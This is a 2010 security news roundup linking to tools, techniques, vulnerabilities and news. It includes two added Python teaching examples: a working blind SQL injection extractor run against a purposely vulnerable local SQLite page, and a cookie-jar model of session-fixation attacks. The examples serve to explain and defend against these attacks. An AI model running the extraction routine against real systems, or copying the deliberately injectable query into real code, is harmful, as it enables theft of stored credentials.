Events Related:
- Slideshow: Fashion Statements from DEFCON 2010 – darkreading.com
Hackers express themselves in more ways than just code.
- Security is a major theme at VMworld 2010 – vmware.com
VMware launched 3 products under the vShield umbrella, to secure virtualized environments all the way from the edge to the endpoint.
Resources:
- IT Security Database – itsecdb.com
This site collects OVAL (Open Vulnerability and Assessment Language) definitions from several sources like Mitre, Red Hat, Suse, NVD, Apache, etc.
- OWASP Secure Coding Practices – Quick Reference Guide – owasp.blogspot.com
In addition, this project already has a very mature release, OWASP Secure Coding Practices – Quick Reference Guide/Version 1.0, which is under formal assessment and seeking Stable Release status.
- The Malware Analyst’s Cookbook, Fuzzy Hashing, and Detecting Self Modifying Code – jessekornblum.livejournal.com
Michael Ligh’s upcoming book, Malware Analyst’s Cookbook and DVD, presents a novel way to detect self-modifying code using fuzzy hashing and memory forensics.
- (IN)Secure Magazine Issue 17 released – spookerlabs.blogspot.com
New release of this awesome free digital magazine.
- Metasploit Megaprimer Videos – Over 2 hrs of video available till now! More being added daily – reddit.com
One of the core issues with Metasploit seems to be the lack of documentation, and some dude decided to create a video series. Looks like he is posting a new one daily and is gonna post around 20 of them of around 25 mins each.
- Windows Operating System Security Guides – disa.mil
Some versions of the STIGs exclude IAVM information. IAVM information is in the FOUO version available in the PKI-enabled area of IASE.
Tools:
- skipfish 1.64b – code.google.com/p/skipfish/
A fully automated, active web application security reconnaissance tool.
- Wireshark 1.4.0, 1.2.11, and 1.0.16 Released – wireshark.org
You can add a protocol field as a column by right-clicking on its packet detail item, and you can adjust some column preferences by right-clicking the column header.
- SSLMap: 0.2.0 Release – westcoasthackers.net
Today we are releasing one of our private tools – SSLMap 0.2.0. SSLMap is a lightweight TLS/SSL cipher suite enumeration tool.
- Laudanum – sourceforge.net/projects/laudanum/
Laudanum is a collection of injectable files, designed to be used in a pentest when SQL injection flaws are found; they are available in multiple languages for different environments.
- Use EMET to manage risk on your PC
The previous version of EMET was strictly a command-line utility that enabled administrators to opt in certain applications to specific exploit mitigations.
  - Microsoft Releases New Version of EMET Exploit Mitigation Toolkit – threatpost.com
  - The Enhanced Mitigation Experience Toolkit 2.0 is Now Available – technet.com
- cvechecker – cvechecker.sourceforge.net
The latest development release is 0.5, released on 2010/09/02.
- PDFTemplate – didierstevens.com
It’s particularly useful for malformed PDF files, like this example with PDFUnknown structures.
- Blind SQL Injection Exploitation with “Blind Cat” tool – itsecuritylab.eu
Important: Blind Cat is not a fully automated tool (not a kind of “one-click-ownage”), but if you catch the idea of it, in return you get huge flexibility to exploit even the most difficult blind SQL injections.
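The technique Blind Cat helps with, boolean-based blind extraction, is worth seeing end to end. The Python below is an added example written for this roundup; it is not Blind Cat's code or anything from itsecuritylab.eu. It builds a constructed, deliberately vulnerable target on an in-memory SQLite database (the `users` table, the `admin` row and the planted `SECRET` value are all invented here), then recovers the admin password one yes/no question at a time: a binary search over `length()` first, then over the code point of each character. A parameterized variant of the same page is included so you can watch the identical probes come back empty-handed against it.

```python
import sqlite3

# Constructed sample data for this example (not from the original article).
SECRET = "s3cr3t!"


def make_db():
    """In-memory database standing in for the target's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "guest", "guest"), (2, "admin", SECRET)])
    return conn


class VulnerableTarget:
    """Simulated page: the only thing it reveals is whether the query matched a row."""

    def __init__(self):
        self.conn = make_db()
        self.requests = 0

    def page(self, user_id: str) -> bool:
        self.requests += 1
        # VULNERABLE on purpose: user input is concatenated into the SQL text.
        sql = f"SELECT username FROM users WHERE id = {user_id}"
        return self.conn.execute(sql).fetchone() is not None


class SafeTarget(VulnerableTarget):
    """Same page, but the id is bound as a parameter, so the input is data, not SQL."""

    def page(self, user_id: str) -> bool:
        self.requests += 1
        sql = "SELECT username FROM users WHERE id = ?"
        return self.conn.execute(sql, (user_id,)).fetchone() is not None


# Attacker side. The subquery names the value we want to pull out, bit by bit.
INNER = "(SELECT password FROM users WHERE username = 'admin')"


def ask(target, condition: str) -> bool:
    """One yes/no question: the page only matches when the injected condition is true."""
    return target.page(f"1 AND ({condition})")


def bisect_int(target, expr: str, lo: int, hi: int) -> int:
    """Recover the integer value of SQL expression `expr`, known to lie in [lo, hi],
    by binary search: each round asks 'is it greater than mid?'."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(target, f"{expr} > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_secret(target, max_len: int = 64) -> str:
    """Blind extraction: first the length, then the code point of every character.
    Against a page that never answers 'true' (the parameterized one) this yields ''."""
    length = bisect_int(target, f"length({INNER})", 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        # SQLite's unicode()/substr() give the code point of character `pos`;
        # ASCII()/SUBSTRING() play the same role on other engines.
        code = bisect_int(target, f"unicode(substr({INNER}, {pos}, 1))", 0, 127)
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    t = VulnerableTarget()
    print(extract_secret(t), "recovered in", t.requests, "requests")
    s = SafeTarget()
    print(repr(extract_secret(s)), "recovered from the parameterized page")
```

Seven requests per character is the cost of a 7-bit search space; narrowing the alphabet (hex digits for a hash, for instance) or switching to time-based probes when the page gives no visible difference are the kinds of adjustments a tool like Blind Cat leaves to the operator.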
Techniques:
- Social-Engineer Toolkit v0.6.1 Tutorial – secmaniac.com
Included in this tutorial is the Teensy USB/HID Attack Vector, the Man Left in the Middle Attack Vector, and the TabNabbing attack vector.
- X-Frame-Options Support in Firefox – michael-coates.blogspot.com
X-Frame-Options is a header value that is set by the webserver which instructs supported browsers on whether to allow a particular page to be framed by other pages.
- Finding Mapped Drives with Meterpreter – skullsecurity.org
The problem generally is that Novell handles things extremely differently than AD, so I assumed that things would be different.
- MITM, SSL and Session Fixation – ha.ckers.org
It’s been known for a long time that HTTP can set cookies that can be read in HTTPS space because cookies don’t follow the same origin policy in the way that JavaScript does.
- Backdoor Password in Accton Based Switches – attackvector.org
On the 15th of August 2009, at the HAR2009 conference, the existence of a backdoor password in Accton-based switches was revealed by Edwin Eefting, Erik Smit and Erwin Drent.
- Compromising Hosts With SNMP – attackvector.org
A community string is, basically, the only authentication you need in order to gain access through SNMP.
- Cross Site Request Forgery (CSRF) PoC Template (by Javascript) – soroush.secproject.com
CSRF PoC template is JavaScript code which is very useful for security researchers and simplifies the art of creating CSRF Proof of Concepts.
- Cross-subdomain Session Fixation – skeptikal.org
Today, I came across a variant which I’d theorized about in the past, but never bothered to find in the wild, and I think it merits some attention.
- To security people: I found this in google: http://bit.ly/bOr4wH If your email is not there, your website is! What’s this!? let me know @irsdl – twitter.com
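Both session-fixation items above (the ha.ckers.org HTTP-to-HTTPS case and the skeptikal.org cross-subdomain case) come down to cookie scoping rules that browsers of the day applied literally: a cookie's identity is (name, domain, path), the Secure flag only controls where a cookie is sent and says nothing about who may set it, and a Domain attribute widens a cookie to every host under that domain. The Python below is an added example for this roundup, not code from either article; it is a deliberately small cookie jar implementing the RFC 6265 storage and matching rules, with the hostnames `bank.example`, `blog.example.com`, `www.example.com` and the cookie values chosen here as constructed sample data. The `leave_secure_cookies_alone` switch models the later browser hardening (RFC 6265bis, "Leave Secure Cookies Alone") that refuses to let a plain-HTTP response overwrite a Secure cookie; in 2010 no browser did this.

```python
from dataclasses import dataclass
from urllib.parse import urlsplit


@dataclass
class Cookie:
    name: str
    value: str
    domain: str
    host_only: bool   # no Domain attribute: sent to exactly this host
    path: str
    secure: bool      # Secure attribute: only *sent* over HTTPS


def domain_match(host: str, domain: str) -> bool:
    """RFC 6265 5.1.3: equal, or host is a subdomain of domain."""
    host, domain = host.lower(), domain.lower()
    return host == domain or host.endswith("." + domain)


def default_path(uri_path: str) -> str:
    """RFC 6265 5.1.4: the request path up to (not including) its last '/'."""
    if not uri_path.startswith("/") or uri_path.count("/") == 1:
        return "/"
    return uri_path[: uri_path.rfind("/")]


def path_match(request_path: str, cookie_path: str) -> bool:
    if request_path == cookie_path:
        return True
    if request_path.startswith(cookie_path):
        return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"
    return False


class CookieJar:
    """Minimal jar: a cookie's identity is (name, domain, path), nothing else."""

    def __init__(self, leave_secure_cookies_alone: bool = False):
        self.cookies = {}
        self.leave_secure_cookies_alone = leave_secure_cookies_alone

    def set_cookie(self, request_url: str, header: str) -> bool:
        u = urlsplit(request_url)
        host, over_https = u.hostname, u.scheme == "https"
        name_value, *attrs = [p.strip() for p in header.split(";")]
        name, _, value = name_value.partition("=")
        attr = {}
        for a in attrs:
            k, _, v = a.partition("=")
            attr[k.strip().lower()] = v.strip()
        domain = attr.get("domain", "").lstrip(".").lower()
        if domain:
            if not domain_match(host, domain):   # 5.3 step 6: Domain must cover the host
                return False
            host_only = False
        else:
            domain, host_only = host, True
        path = attr.get("path") or default_path(u.path)
        key = (name, domain, path)
        old = self.cookies.get(key)
        if old and old.secure and not over_https and self.leave_secure_cookies_alone:
            return False   # modern rule: plain HTTP may not overwrite a Secure cookie
        # Classic RFC 6265: same (name, domain, path) simply replaces the old cookie,
        # even when the old one was Secure and this one arrived over HTTP.
        self.cookies[key] = Cookie(name, value, domain, host_only, path, "secure" in attr)
        return True

    def cookie_header(self, request_url: str) -> dict:
        """Cookies that would go into the Cookie: header of a request to request_url."""
        u = urlsplit(request_url)
        host, over_https = u.hostname, u.scheme == "https"
        sent = {}
        for c in self.cookies.values():
            if c.host_only and host != c.domain:
                continue
            if not c.host_only and not domain_match(host, c.domain):
                continue
            if not path_match(u.path or "/", c.path):
                continue
            if c.secure and not over_https:
                continue
            sent[c.name] = c.value
        return sent


def mitm_http_fixation(strict: bool) -> dict:
    """ha.ckers.org scenario: the site set its session cookie over HTTPS with Secure,
    then a plain-HTTP response (e.g. injected by a network MITM) sets the same name."""
    jar = CookieJar(leave_secure_cookies_alone=strict)
    jar.set_cookie("https://bank.example/login", "SESSIONID=real; Path=/; Secure")
    jar.set_cookie("http://bank.example/", "SESSIONID=attacker; Path=/")
    return jar.cookie_header("https://bank.example/account")


def cross_subdomain_fixation() -> dict:
    """skeptikal.org scenario: a cookie set by one subdomain with Domain=example.com
    reaches every sibling host, so it can fix the session on www.example.com."""
    jar = CookieJar()
    jar.set_cookie("http://blog.example.com/", "tracker=x")   # host-only: stays on blog
    jar.set_cookie("http://blog.example.com/", "SESSIONID=attacker; Domain=example.com; Path=/")
    return jar.cookie_header("https://www.example.com/account")
```

The practical consequences are the usual ones: a Secure flag alone does not protect a session from fixation, the server has to reject session identifiers it did not issue and rotate the identifier on login, and a domain-wide cookie is only as trustworthy as the least trustworthy host under that domain.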
Vulnerabilities:
- More DLL hijack news
And the saga continues: the battle between Microsoft and its DLL security hole.
  - An update on the DLL-preloading remote attack vector – technet.com
  - Microsoft tool for DLL vulnerability interferes with some applications – h-online.com
  - DLL hijacking – what are you doing? – sans.edu
  - Presenting DllHijackAuditor – Smart Tool to Audit Dll Hijack Vulnerability – securityxploded.com
  - Protecting Against Remote DLL Preloading Vulnerabilities – iss.net
  - KeePass version 2.12 <= Insecure DLL Hijacking Vulnerability (dwmapi.dll) – seclists.org
  - DLL Search Order Hijacking Revisited – mandiant.com
- New Remote Flaw in Apple QuickTime Bypasses ASLR and DEP – threatpost.com
A Spanish security researcher has discovered a new vulnerability in Apple’s QuickTime software that can be used to bypass both ASLR and DEP on current versions of Windows and give an attacker control of a remote PC.
- Zscaler researcher finds scanning flaw in HP all-in-one printers – lastwatchdog.com
Using the WebScan functionality, he could write a script to regularly run the scanner remotely, retrieving an image of anything that has been left on the scanner.
- TANDBERG Video Communication Server Arbitrary File Retrieval Vulnerability – securiteam.com
This issue would allow an authenticated attacker (who has access as an administrator or less privileged user on the web administration interface) to retrieve files from the filesystem which are readable by the “nobody” system user.
- VMware Tools for Windows Local Binary Planting Vulnerability – securiteam.com
There is a code execution vulnerability in VMware Tools for Windows that allows a local attacker (being able to log on locally to the virtual machine) to plant a malicious executable with a specific name on the local drive and wait for this executable to get launched when another user logs on to the virtual machine.
Vendor/Software Patches:
- Fixes from MS on the latest DLL flaw
Microsoft released a fix for the DLL vuln that was discovered recently, but it was flawed as well. There, I fixed it.
  - MS Fix Shores Up Security for Windows Users – krebsonsecurity.com
  - Microsoft Publishes New FixIt Tool For DLL Bug – threatpost.com
Other News:
- Wolfhound Sniffs out Contraband Cell Phones – gearlog.com
Using it requires little training and it doesn’t jam cell phones (which is illegal, since it prohibits legal cell phone use).
- Alleged Carder ‘BadB’ Charged in $9 Million ATM Heist – wired.com
On Nov. 8, 2008, an army of cashers armed with cloned payroll cards simultaneously hit more than 2,000 ATMs around the world, looting them of $9.5 million in less than a day.
- That nice, new computerized car you just bought could be hackable – snosoft.blogspot.com
While spoofing low-tire-pressure readings does not appear to be critical at first, it will lead to a dashboard warning and will likely cause the driver to pull over and inspect the tire.
- Pirate Bay Documentary in the Works – wired.com
The director, Simon Klose, who has a law degree, has 200 hours of footage saved up and plans to record more during the trio’s appeal against their verdict, which is set for less than a month from now, on 28 September, 2010.
- Cyber Thieves Steal Nearly $1,000,000 from University of Virginia College – krebsonsecurity.com
The attackers stole the money from The University of Virginia’s College at Wise, a 4-year public liberal arts college located in the town of Wise in southwestern Virginia.
- Snoop Dogg Joins the War on Cybercrime – securityweek.com
In a somewhat untraditional partnership, Snoop Dogg and Symantec’s Norton want you to show off your lyrical skills on the subject of cybercrime and enter the “Hack is Wack” cybercrime rap contest.
- New government ID cards easily hacked – thelocal.de
The sensitive personal information found on the new German identification cards with data chips scheduled for nationwide introduction this November can be easily hacked, according to testing done by a TV news show.
- Remediation – The Game – cigital.com
Remediation has players compete to end up with the highest score while playing through real life software security scenarios.
- Ambition Over Intelligence – Twitter, OAuth, and Wrong – preachsecurity.blogspot.com
If you do a web search for “hacked twitter account” you’ll get thousands upon thousands of entries.
- Tech Insight: Retooling Vulnerability Scanning, Penetration Testing for IPv6 – darkreading.com
Traditional host discovery via network scanning won’t work with IPv6, but alternative methods are available.
- HP Holds Navy Network ‘Hostage’ for $3.3 Billion – wired.com
After 10 years and nearly $10 billion, many sailors are tired of leasing their PCs, and relying on a private contractor to operate most of their data systems.
- Defending a New Domain – foreignaffairs.com
Every day, U.S. military and civilian networks are probed thousands of times and scanned millions of times.
- Defense Department’s Cyberwar Credibility Gap – securityweek.com
The question posed by Wisniewski and others is, why would a foreign intelligence agency attack the U.S. government with such a low-powered weapon?